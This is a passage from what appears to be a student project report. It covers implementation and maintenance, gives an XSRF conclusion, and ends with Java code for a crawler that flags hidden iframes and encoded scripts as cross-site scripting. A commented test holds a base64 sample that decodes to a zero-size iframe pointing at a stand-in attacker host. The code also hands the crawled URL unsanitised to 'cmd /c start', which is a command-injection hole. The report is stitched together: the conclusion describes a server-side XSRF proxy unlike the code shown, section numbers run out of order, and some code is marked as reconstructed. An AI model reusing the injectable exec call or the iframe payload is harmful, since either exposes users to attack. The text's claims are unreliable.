effective. Here it is the implementation of a modified application to replace an existing
one. This type of conversion is relatively easy to handle, provided there are no major
changes in the system.
Each program was tested individually at the time of development using test
data, and it was verified that the programs link together in the way specified in the
program specification; the computer system and its environment were tested to the
satisfaction of the user. The system that has been developed has been accepted and proved
satisfactory for the user, and so it is going to be implemented very soon. A
simple operating procedure is included so that the user can understand the different
functions clearly and quickly.
Initially, as a first step, the executable form of the application is to be
created and loaded on the common server machine, which is accessible to all users,
and the server is to be connected to a network. The final stage is to document the entire
system, which describes the components and the operating procedures of the system.
Implementation is the stage of the project when the theoretical design is
turned into a working system. Thus it can be considered the most critical stage
in achieving a successful new system and in giving the user confidence that the new
system will work and be effective.
The implementation stage involves careful planning, investigation of the
existing system and its constraints on implementation, designing of methods to achieve
changeover and evaluation of changeover methods.
Implementation is the process of converting a new system design into
operation. It is the phase that focuses on user training, site preparation and file conversion
for installing a candidate system. The important factor that should be considered here is
that the conversion should not disrupt the functioning of the organization.
7.2 MAINTENANCE
The objective of this maintenance work is to make sure that the system keeps
working at all times without any bug. Provision must be made for environmental changes
which may affect the computer or software system. This is called the maintenance of the
system. Nowadays there is rapid change in the software world, and the system should be
capable of adapting to these changes. In our project, new processes can be added without
affecting other parts of the system.
Maintenance plays a vital role. The system is able to accept any modification after
its implementation. This system has been designed to accommodate all new changes, and
doing so will not affect the system's performance or its accuracy.
9.2.1 Testing Strategies:
A number of software testing strategies have been proposed in the literature.
All provide the software developer with a template for testing, and all have the following
generic characteristics:
Testing begins at the component level and works outward toward the integration of the
entire computer-based system.
Different testing techniques are appropriate at different points in time.
The developer of the software conducts testing and, for large projects, an independent
test group does as well.
Testing and debugging are different activities, but debugging must be accommodated in
any testing strategy.
CHAPTER 8
CONCLUSION AND FUTURE WORK
8.1 CONCLUSION
In a cross site request forgery (XSRF) attack, the trust of a web application
in its authenticated users is exploited, allowing an attacker to make arbitrary HTTP
requests in the victim's name. Unfortunately, current XSRF mitigation techniques have
shortcomings that limit their general applicability. To address this problem, this paper
presents a solution that provides a completely automatic protection from XSRF attacks.
Our approach is based on a server-side proxy that detects and prevents XSRF attacks in a
way that is transparent to users as well as to the web application itself. We have
successfully used our prototype to secure a number of popular open-source web
applications that were vulnerable to XSRF.
Our experimental results demonstrate that the solution is viable, and that we
can secure existing web applications without adversely affecting their behavior.
Currently, XSRF attacks are relatively unknown to both web developers and attackers
that are on the hunt for easy targets. However, we expect the attention paid to this class of
attacks to soon reach that of more traditional web security problems (such as XSS or SQL
injections), and we hope that our solution will prove useful in protecting vulnerable web
applications.
8.2 FUTURE WORK
Our future work includes detection of complex multi-step attacks and the
evaluation of performance penalties for legitimate requests.
CHAPTER 9
APPENDICES
9.1 SAMPLE SOURCE CODE
import java.io.IOException;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.net.URL;
import java.util.Enumeration;
import javax.swing.text.AttributeSet;
import javax.swing.text.MutableAttributeSet;
import javax.swing.text.html.HTML;
import javax.swing.text.html.HTMLEditorKit;
import javax.swing.*;
public class MainClass {
static ReportAttributes ra=null;
//static String filename="http://localhost:8080/SEARCH/search.html";
// public static void main(String[] args) {
public void check(String filename)
{
ParserGetter kit = new ParserGetter();
HTMLEditorKit.Parser parser = kit.getParser();
HTMLEditorKit.ParserCallback callback = new ReportAttributes();
ra=new ReportAttributes();
System.out.println("kkk");
try {
URL u = new URL(filename);
InputStream in = u.openStream();
InputStreamReader r = new InputStreamReader(in);
parser.parse(r, callback, false);
} catch (IOException e) {
System.err.println(e);
}
}
}
class ReportAttributes extends HTMLEditorKit.ParserCallback {
public String heightstr="",widthstr="";
public void handleStartTag(HTML.Tag tag, MutableAttributeSet attributes, int position)
{
this.listAttributes(attributes);
}
private void listAttributes(AttributeSet attributes) {
Enumeration e = attributes.getAttributeNames();
while (e.hasMoreElements()) {
Object name = e.nextElement();
Object value = attributes.getAttribute(name);
if (!attributes.containsAttribute(name.toString(), value)) {
//System.out.println("containsAttribute() fails");
}
if (!attributes.isDefined(name.toString())) {
//System.out.println("isDefined() fails");
}
//System.out.println("kkkk"+name + "=" +"kkooo"+value);
if((name.toString()).equals("height"))
{
if(value.equals("0"))
{
JOptionPane.showMessageDialog(null,"Malicious Webpage");
}
}
if((name.toString()).equals("width"))
{
if(value.equals("0"))
{
// JOptionPane.showMessageDialog(null,"Malicious Webpage");
}
}
}
}
public void handleSimpleTag(HTML.Tag tag, MutableAttributeSet attributes, int
position) {
this.listAttributes(attributes);
}
}
class ParserGetter extends HTMLEditorKit {
public HTMLEditorKit.Parser getParser() {
return super.getParser();
}
}
import javax.swing.text.html.*;
public class HTMLParse extends HTMLEditorKit {
public HTMLEditorKit.Parser getParser()
{
return super.getParser();
}
}
import java.awt.*;import javax.swing.*;
import java.net.*;
import java.io.*;
public class CheckLinks extends javax.swing.JFrame implements
Runnable,ISpiderReportable {
public CheckLinks()
{
try
{
setTitle("Cross-Site Scripting");
System.out.println("kkkk");
getContentPane().setLayout(null);
setSize(405,288);
setVisible(false);
label1.setText("Enter a URL:");
getContentPane().add(label1);
label1.setBounds(12,12,84,12);
begin.setText("Enter");
begin.setActionCommand("Begin");
getContentPane().add(begin);
begin.setBounds(12,36,84,24);
getContentPane().add(url);
url.setBounds(108,36,288,24);
errorScroll.setAutoscrolls(true);
errorScroll.setHorizontalScrollBarPolicy(javax.swing.
ScrollPaneConstants.HORIZONTAL_SCROLLBAR_ALWAYS);
errorScroll.setVerticalScrollBarPolicy(javax.swing.
ScrollPaneConstants.VERTICAL_SCROLLBAR_ALWAYS);
errorScroll.setOpaque(true);
getContentPane().add(errorScroll);
errorScroll.setBounds(12,120,384,156);
errors.setEditable(false);
errorScroll.getViewport().add(errors);
errors.setBounds(0,0,366,138);
current.setText("Current Page: ");
getContentPane().add(current);
current.setBounds(12,72,400,12);
goodLinksLabel.setText("Status : ");
getContentPane().add(goodLinksLabel);
goodLinksLabel.setBounds(12,96,192,12);
// badLinksLabel.setText("Bad Links: 0");
//getContentPane().add(badLinksLabel);
badLinksLabel.setBounds(216,96,96,12);
setDefaultCloseOperation(EXIT_ON_CLOSE);
SymAction lSymAction = new SymAction();
begin.addActionListener(lSymAction);
}
catch(Exception ex)
{
ex.printStackTrace();
System.out.println(ex);
}
}
public void addNotify(){
Dimension size = getSize();
super.addNotify();
if ( frameSizeAdjusted )
return;
frameSizeAdjusted = true;
Insets insets = getInsets();
javax.swing.JMenuBar menuBar = getRootPane().getJMenuBar();
int menuBarHeight = 0;
if ( menuBar != null )
menuBarHeight = menuBar.getPreferredSize().height;
setSize(insets.left + insets.right + size.width, insets.top +
insets.bottom + size.height +
menuBarHeight);
}
boolean frameSizeAdjusted = false;
javax.swing.JLabel label1 = new javax.swing.JLabel();
javax.swing.JButton begin = new javax.swing.JButton();
javax.swing.JTextField url = new javax.swing.JTextField();
javax.swing.JScrollPane errorScroll =
new javax.swing.JScrollPane();
static javax.swing.JTextArea errors = new javax.swing.JTextArea();
javax.swing.JLabel current = new javax.swing.JLabel();
static javax.swing.JLabel goodLinksLabel = new javax.swing.JLabel();
javax.swing.JLabel badLinksLabel = new javax.swing.JLabel();
protected Thread backgroundThread;
protected Spider spider;
protected URL base;
protected int badLinksCount = 0;
protected int goodLinksCount = 0;
class SymAction implements java.awt.event.ActionListener {
public void actionPerformed(java.awt.event.ActionEvent event)
{
Object object = event.getSource();
if ( object == begin )
begin_actionPerformed(event);
}
}
void begin_actionPerformed(java.awt.event.ActionEvent event)
{
if ( backgroundThread==null ) {
begin.setLabel("Cancel");
backgroundThread = new Thread(this);
backgroundThread.start();
goodLinksCount=0;
badLinksCount=0;
current.setText("Current Page: " + url.getText());
//goodLinksLabel.setText("Good Links: " + goodLinksCount);
} else {
spider.cancel();
}
}
public void run()
{
try {
errors.setText("");
spider = new Spider(this);
spider.clear();
base = new URL(url.getText());
spider.addURL(base);
spider.begin();
Runnable doLater = new Runnable()
{
public void run()
{
begin.setText("Enter");
}
};
SwingUtilities.invokeLater(doLater);
backgroundThread=null;
} catch ( MalformedURLException e ) {
UpdateErrors err = new UpdateErrors();
err.msg = "Bad address.";
SwingUtilities.invokeLater(err);
}
}
public boolean spiderFoundURL(URL base,URL url)
{
UpdateCurrentStats cs = new UpdateCurrentStats();
cs.msg = url.toString();
SwingUtilities.invokeLater(cs);
if ( !checkLink(url) ) {
UpdateErrors err = new UpdateErrors();
err.msg = url+"(on page " + base + ")\n";
SwingUtilities.invokeLater(err);
badLinksCount++;
return false;
}
goodLinksCount++;
if ( !url.getHost().equalsIgnoreCase(base.getHost()) )
return false;
else
return true;
}
public void spiderURLError(URL url)
{
}
protected boolean checkLink(URL url)
{
try {
URLConnection connection = url.openConnection();
connection.connect();
return true;
} catch ( IOException e ) {
return false;
}
}
public static void setErrorStatus(String error)
{
//if(loc == 0)
errors.append(error+"\n");
/*else
errors.insert(error, loc);*/
}
public static void setStatusLabel(String sts)
{
goodLinksLabel.setText(sts);
}
public void spiderFoundEMail(String email)
{
}
class UpdateErrors implements Runnable {
public String msg;
public void run()
{
errors.append(msg);
}
}
class UpdateCurrentStats implements Runnable {
public String msg;
public void run()
{
current.setText("Current Page: " + url.getText());
goodLinksLabel.setText("Good Links: " + goodLinksCount);
badLinksLabel.setText("Bad Links: " + badLinksCount);
}
}
}
import java.util.*;
import java.net.*;
import java.io.*;
import javax.swing.text.*;
import javax.swing.text.html.*;
public class Spider
{
String pageCnt = "";
protected Collection workloadError = new ArrayList(3);
protected Collection workloadWaiting = new ArrayList(3);
protected Collection workloadProcessed = new ArrayList(3);
protected ISpiderReportable report;
protected boolean cancel = false;
public Spider(ISpiderReportable report)
{
this.report = report;
}
public Collection getWorkloadError()
{
return workloadError;
}
public Collection getWorkloadWaiting()
{
return workloadWaiting;
}
public Collection getWorkloadProcessed()
{
return workloadProcessed;
}
public void clear()
{
getWorkloadError().clear();
getWorkloadWaiting().clear();
getWorkloadProcessed().clear();
}
public void cancel()
{
cancel = true;
}
public void addURL(URL url)
{
if ( getWorkloadWaiting().contains(url) )
return;
if ( getWorkloadError().contains(url) )
return;
if ( getWorkloadProcessed().contains(url) )
return;
log("Adding to workload: " + url );
getWorkloadWaiting().add(url);
}
public void processURL(URL url)
{
try {
log("Processing: " + url );
URLConnection connection = url.openConnection();
if ( (connection.getContentType()!=null) &&
!connection.getContentType().toLowerCase().startsWith("text/") ) {
getWorkloadWaiting().remove(url);
getWorkloadProcessed().add(url);
log("Not processing because content type is: " +
connection.getContentType() );
return;
}
InputStream is = connection.getInputStream();
pageCnt = ""; // reset per page; the field would otherwise accumulate across URLs
int i = 0;
while((i = is.read()) != -1)
pageCnt += (char)i;
// the stream has been read to the end, so the parser is fed the buffered page text
HTMLEditorKit.Parser parse = new HTMLParse().getParser();
parse.parse(new StringReader(pageCnt), new Parser(url), true);
} catch ( IOException e ) {
getWorkloadWaiting().remove(url);
getWorkloadError().add(url);
log("Error: " + url );
report.spiderURLError(url);
return;
}
getWorkloadWaiting().remove(url);
getWorkloadProcessed().add(url);
log("Complete: " + url );
MainClass m=new MainClass();
CheckLinks.setErrorStatus("Removing Comments\n");
String cntwocomment = removeComments(pageCnt);
CheckLinks.setErrorStatus("Processing Script Contents\n");
i = 0; // reuse the loop index declared above rather than redeclaring it
boolean find1 = false, find2 = false, find3 = false, find4 = false;
int start = 0, end = 0, start1 = 0, end1 = 0;
String scriptCnt = "";
boolean scriptstatus = true, iframestatus = true;
String scriptContent = "";
while(i < cntwocomment.length()-8)
{
if(find1) {
String temp = cntwocomment.substring(i, i+7);
if(temp.equalsIgnoreCase("/script")) {
find2 = true;
end = i+8;
}
} else {
String temp = cntwocomment.substring(i, i+7);
if(temp.equalsIgnoreCase("<script")) {
find1 = true;
start = i;
}
// assumed completion: the lines that opened the iframe check, and those that set
// find4 and end1 for its closing tag, are not present in this copy of the source
if(temp.equalsIgnoreCase("<iframe")) {
find3 = true;
start1 = i;
System.out.println(temp);
}
}
if(find1 && find2)
{
scriptContent = cntwocomment.substring(start, end);
//System.out.println("script : "+scriptContent);
find1 = false;
find2 = false;
scriptstatus = new ScriptReader(scriptContent).scanScript();
if(!scriptstatus)
break;
}
if(find3 && find4)
{
String iframeContent = cntwocomment.substring(start1, end1);
find3 = false;
find4 = false;
iframestatus = new ScriptReader(iframeContent).scanIframe();
if(!iframestatus)
break;
}
i++;
}
CheckLinks.setErrorStatus("Processing completed");
if(scriptstatus && iframestatus)
{
CheckLinks.setStatusLabel("Status : Verified");
try
{
Runtime r=Runtime.getRuntime();
r.exec("cmd /c start "+url);
}
catch(Exception ex)
{
System.out.println(ex);
}
} else {
CheckLinks.setStatusLabel("Status : Cross-site Scripting");
System.out.println("Cross-site Scripting");
}
}
public void begin()
{
cancel = false;
while ( !getWorkloadWaiting().isEmpty() && !cancel ) {
Object list[] = getWorkloadWaiting().toArray();
for ( int i=0;(i<list.length)&&!cancel;i++ )
processURL((URL)list[i]);
}
}
// callback that collects the links found on each parsed page
protected class Parser extends HTMLEditorKit.ParserCallback {
protected URL base;
public Parser(URL base)
{
this.base = base;
}
public void handleSimpleTag(HTML.Tag t,
MutableAttributeSet a,int pos)
{
String href = (String)a.getAttribute(HTML.Attribute.HREF);
if( (href==null) && (t==HTML.Tag.FRAME) )
href = (String)a.getAttribute(HTML.Attribute.SRC);
if ( href==null )
return;
int i = href.indexOf('#');
if ( i!=-1 )
href = href.substring(0,i);
if ( href.toLowerCase().startsWith("mailto:") ) {
report.spiderFoundEMail(href);
return;
}
handleLink(base,href);
}
public void handleStartTag(HTML.Tag t,
MutableAttributeSet a,int pos)
{
handleSimpleTag(t,a,pos);
}
protected void handleLink(URL base,String str)
{
try {
URL url = new URL(base,str);
if ( report.spiderFoundURL(base,url) )
addURL(url);
} catch ( MalformedURLException e ) {
log("Found malformed URL: " + str );
}
}
}
public String removeComments(String content)
{
int i = 0;
boolean find1 = false, find2 = false;
int start = 0, end = 0;
String Cntwocomment = "";
while(i < content.length()-4)
{
if(find1)
{
String temp = content.substring(i, i+3);
if(temp.equals("-->")) {
find2 = true;
end = i+3;
}
} else {
String temp = content.substring(i, i+4);
if(temp.equals("<!--")) {
find1 = true;
start = i;
}
}
// assumed completion: the original lines for this part of the method are not present
// in this copy; a found <!-- ... --> comment is cut out and scanning resumes where it started
if(find1 && find2)
{
content = content.substring(0, start) + content.substring(end);
i = start;
find1 = false;
find2 = false;
continue;
}
i++;
}
Cntwocomment = content;
return Cntwocomment;
}
public void log(String entry)
{
System.out.println( (new Date()) + ":" + entry );
}
}
import java.net.*;
interface ISpiderReportable {
public boolean spiderFoundURL(URL base,URL url);
public void spiderURLError(URL url);
public void spiderFoundEMail(String email);
}
import java.util.regex.*;
public class ScriptReader
{
Pattern p1, p2, p3, p4, p5, p6, p7, p8, p9,p10, p11, p12, p13, p14,p15,p16,p17;
String script = "", encScript = "";
boolean showStatus = true, enc = false;
public ScriptReader(String script)
{
this.script = script;
p1 = Pattern.compile("script");
p2 = Pattern.compile("iframe");
p3 = Pattern.compile("width");
p4 = Pattern.compile("height");
p5 = Pattern.compile("style");
p6 = Pattern.compile("width=0");
p7 = Pattern.compile("height=0");
p8 = Pattern.compile("display:none;");
p9 = Pattern.compile("width=\"0\"");
p10 = Pattern.compile("height=\"0\"");
p11 = Pattern.compile("\"display:none\"");
//p12 = Pattern.compile("@&%mkmd#@~ZQAA");
//p13 = Pattern.compile("#@ZQAAKmsYRSDb");
//p14 = Pattern.compile("language=\"JScript\"");
//p15 = Pattern.compile("language=\"JavaScript\"");
p14 = Pattern.compile("language=\"jscript.encode\"");
p15 = Pattern.compile("language=\"javascript.encode\"");
}
public boolean scanScript()
{
boolean status = true;
//CheckLinks.setErrorStatus("Processing Script Content\n");
Matcher m1 = p1.matcher(script);
int loc = 0;
if(m1.find())
{
String lower = script.toLowerCase();
Matcher m14 = p14.matcher(lower);
Matcher m15 = p15.matcher(lower);
String temp = script.substring(script.indexOf(">")+1);
encScript = temp.substring(0, temp.lastIndexOf("<")); // assumed delimiter: the closing tag
// encoded script bodies are base64 decoded before scanning
if(m14.find() || m15.find())
{
script =
ScriptDecoder.decodeString(encScript.replace("\n", "").trim());
enc = true;
}
System.out.println("Script "+script);
script = script.toLowerCase();
System.out.println("Processing Script");
Matcher m2 = p2.matcher(script);
if(m2.find()) {
System.out.println("Processing IFrame");
Matcher m3 = p3.matcher(script);
if(m3.find()) {
Matcher m6 = p6.matcher(script);
Matcher m9 = p9.matcher(script);
if(m6.find() || m9.find()) {
System.out.println("Width Property is Zero");
status = false;
if(showStatus) {
if(enc)
showScript("Encoded Content : \n"+encScript+"\n");
showScript("Script Source : \n"+script+"\n");
showStatus = false;
}
CheckLinks.setErrorStatus("Width Property is Zero");
}
} else {
System.out.println("There is No Width Property");
}
Matcher m4 = p4.matcher(script);
if(m4.find()) {
Matcher m7 = p7.matcher(script);
Matcher m10 = p10.matcher(script);
if(m7.find() || m10.find()) {
System.out.println("Height Property is Zero");
status = false;
if(showStatus) {
if(enc)
showScript("Encoded Content : \n"+encScript+"\n");
showScript("Script Source : \n"+script+"\n");
showStatus = false;
}
CheckLinks.setErrorStatus("Height Property is Zero");
}
} else {
System.out.println("There is No Height Property");
}
Matcher m5 = p5.matcher(script);
if(m5.find()) {
Matcher m8 = p8.matcher(script);
Matcher m11 = p11.matcher(script);
if(m8.find() || m11.find()) {
System.out.println("Display Property is None");
status = false;
if(showStatus) {
if(enc)
showScript("Encoded Content : \n"+encScript+"\n");
showScript("Script Source : \n"+script+"\n");
showStatus = false;
}
CheckLinks.setErrorStatus("Display Property is None");
}
} else {
System.out.println("There is No Display Property");
}
}
} else {
System.out.println("No Script");
}
return status;
}
public void showScript(String script)
{
if(showStatus)
CheckLinks.setErrorStatus(script);
}
public boolean scanIframe()
{
boolean status = true;
System.out.println("IFrame "+script);
script = script.toLowerCase();
System.out.println("Processing Script");
Matcher m2 = p2.matcher(script);
if(m2.find())
{
System.out.println("Processing IFrame");
Matcher m3 = p3.matcher(script);
if(m3.find()) {
Matcher m6 = p6.matcher(script);
Matcher m9 = p9.matcher(script);
if(m6.find() || m9.find()) {
System.out.println("Width Property is Zero");
status = false;
if(showStatus) {
showScript("IFrame Source : \n"+script+"\n");
showStatus = false;
}
CheckLinks.setErrorStatus("Width Property is Zero");
}
} else {
System.out.println("There is No Width Property");
}
Matcher m4 = p4.matcher(script);
if(m4.find()) {
Matcher m7 = p7.matcher(script);
Matcher m10 = p10.matcher(script);
if(m7.find() || m10.find()) {
System.out.println("Height Property is Zero");
status = false;
if(showStatus) {
showScript("IFrame Source : \n"+script+"\n");
showStatus = false;
}
CheckLinks.setErrorStatus("Height Property is Zero");
}
} else {
System.out.println("There is No Height Property");
}
Matcher m5 = p5.matcher(script);
if(m5.find()) {
Matcher m8 = p8.matcher(script);
Matcher m11 = p11.matcher(script);
if(m8.find() || m11.find()) {
System.out.println("Display Property is None");
status = false;
if(showStatus) {
showScript("IFrame Source : \n"+script+"\n");
showStatus = false;
}
CheckLinks.setErrorStatus("Display Property is None");
}
} else {
System.out.println("There is No Display Property");
}
}
return status;
}
/*public static void main(String[] args)
{
String script1 = " ";
String script2 = " ";
String script3 = "ZG9jdW1lbnQud3JpdGVsbiAoIjxJZnJhbWUiIHNyYz
1odHRwOi8vd3d3LmhhY2tlcmV4YW1wbGUuY24gd2lkdGg9MCBoZWlnaHQ9MD48
Ly9pZnJhbWU+KTs=";
new ScriptReader(script1).scanScript();
new ScriptReader(script2).scanScript();
new ScriptReader(script3).scanScript();
}*/
}
public class ScriptEncoder
{
public static char[] map1 = new char[64];
public static byte[] map2 = new byte[128];
public ScriptEncoder()
{
}
static
{
int i=0;
for (char c='A'; c<='Z'; c++) map1[i++] = c;
for (char c='a'; c<='z'; c++) map1[i++] = c;
for (char c='0'; c<='9'; c++) map1[i++] = c;
map1[i++] = '+'; map1[i++] = '/';
}
// reverse map from base64 character to 6-bit value; -1 marks an illegal character
static
{
for (int i=0; i<map2.length; i++) map2[i] = -1;
for (int i=0; i<64; i++) map2[map1[i]] = (byte)i;
}
public static String encodeString(String s)
{
return new String(encode(s.getBytes()));
}
public static char[] encode (byte[] in)
{
return encode(in,in.length);
}
public static char[] encode (byte[] in, int iLen)
{
int oDataLen = (iLen*4+2)/3; // output length without padding
int oLen = ((iLen+2)/3)*4; // output length including padding
char[] out = new char[oLen];
int ip = 0;
int op = 0;
while (ip < iLen)
{
int i0 = in[ip++] & 0xff;
int i1 = ip < iLen ? in[ip++] & 0xff : 0;
int i2 = ip < iLen ? in[ip++] & 0xff : 0;
int o0 = i0 >>> 2;
int o1 = ((i0 & 3) << 4) | (i1 >>> 4);
int o2 = ((i1 & 0xf) << 2) | (i2 >>> 6);
int o3 = i2 & 0x3F;
out[op++] = map1[o0];
out[op++] = map1[o1];
out[op] = op < oDataLen ? map1[o2] : '='; op++;
out[op] = op < oDataLen ? map1[o3] : '='; op++;
}
return out;
}
public static void main(String a[])
{
System.out.println(encodeString("document.writeln(\"\");"));
}
}
public class ScriptDecoder
{
    public static char[] map1 = new char[64];
    public static byte[] map2 = new byte[128];

    public ScriptDecoder()
    {
    }

    // Build the Base64 alphabet: A-Z, a-z, 0-9, '+', '/'.
    static
    {
        int i = 0;
        for (char c = 'A'; c <= 'Z'; c++) map1[i++] = c;
        for (char c = 'a'; c <= 'z'; c++) map1[i++] = c;
        for (char c = '0'; c <= '9'; c++) map1[i++] = c;
        map1[i++] = '+';
        map1[i++] = '/';
    }

    // Reverse map: -1 marks characters outside the alphabet so decode() can reject them.
    static
    {
        for (int i = 0; i < map2.length; i++) map2[i] = -1;
        for (int i = 0; i < 64; i++) map2[map1[i]] = (byte) i;
    }

    public static byte[] decode(char[] in)
    {
        int iLen = in.length;
        if (iLen % 4 != 0)
            throw new IllegalArgumentException("Length of Base64 encoded input string is not a multiple of 4.");
        // Trailing '=' padding carries no data.
        while (iLen > 0 && in[iLen - 1] == '=') iLen--;
        int oLen = (iLen * 3) / 4;
        byte[] out = new byte[oLen];
        int ip = 0;
        int op = 0;
        while (ip < iLen)
        {
            // Four encoded characters ('A' = 0 stands in for missing ones) ...
            int i0 = in[ip++];
            int i1 = in[ip++];
            int i2 = ip < iLen ? in[ip++] : 'A';
            int i3 = ip < iLen ? in[ip++] : 'A';
            if (i0 > 127 || i1 > 127 || i2 > 127 || i3 > 127)
                throw new IllegalArgumentException("Illegal character in Base64 encoded data.");
            int b0 = map2[i0];
            int b1 = map2[i1];
            int b2 = map2[i2];
            int b3 = map2[i3];
            if (b0 < 0 || b1 < 0 || b2 < 0 || b3 < 0)
                throw new IllegalArgumentException("Illegal character in Base64 encoded data.");
            // ... give 24 bits, which are reassembled into up to three output bytes.
            int o0 = (b0 << 2) | (b1 >>> 4);
            int o1 = ((b1 & 0xf) << 4) | (b2 >>> 2);
            int o2 = ((b2 & 3) << 6) | b3;
            out[op++] = (byte) o0;
            if (op < oLen) out[op++] = (byte) o1;
            if (op < oLen) out[op++] = (byte) o2;
        }
        return out;
    }
}
9.2 SCREEN SHOTS